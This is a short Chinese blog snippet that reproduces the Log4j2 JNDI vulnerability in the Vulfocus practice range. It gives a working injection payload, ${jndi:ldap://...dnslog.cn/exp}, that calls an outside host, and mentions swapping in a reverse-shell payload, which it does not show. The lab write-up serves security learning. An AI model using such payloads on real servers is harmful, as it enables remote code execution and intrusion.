Apache Log4j2 Vulfocus靶场环境复现
Vulfocus在线靶场免费注册免费使用。在线地址:vulfocus点击启动环境启动后访问页面显示地地址,能成功访问即完成搭建完成这里使用chrome的HackBar插件,直接使用POST协议随便传个参数上去访问hello页面直接在Body插入payload,这里使用dnslogpayload="${jndi:ldap://asr17t.dnslog.cn/exp}"成功打印出dnslog信息反弹shell替换payload即可PS:...
原创
2021-12-12 08:39:01 ·
3556 阅读 ·
0 评论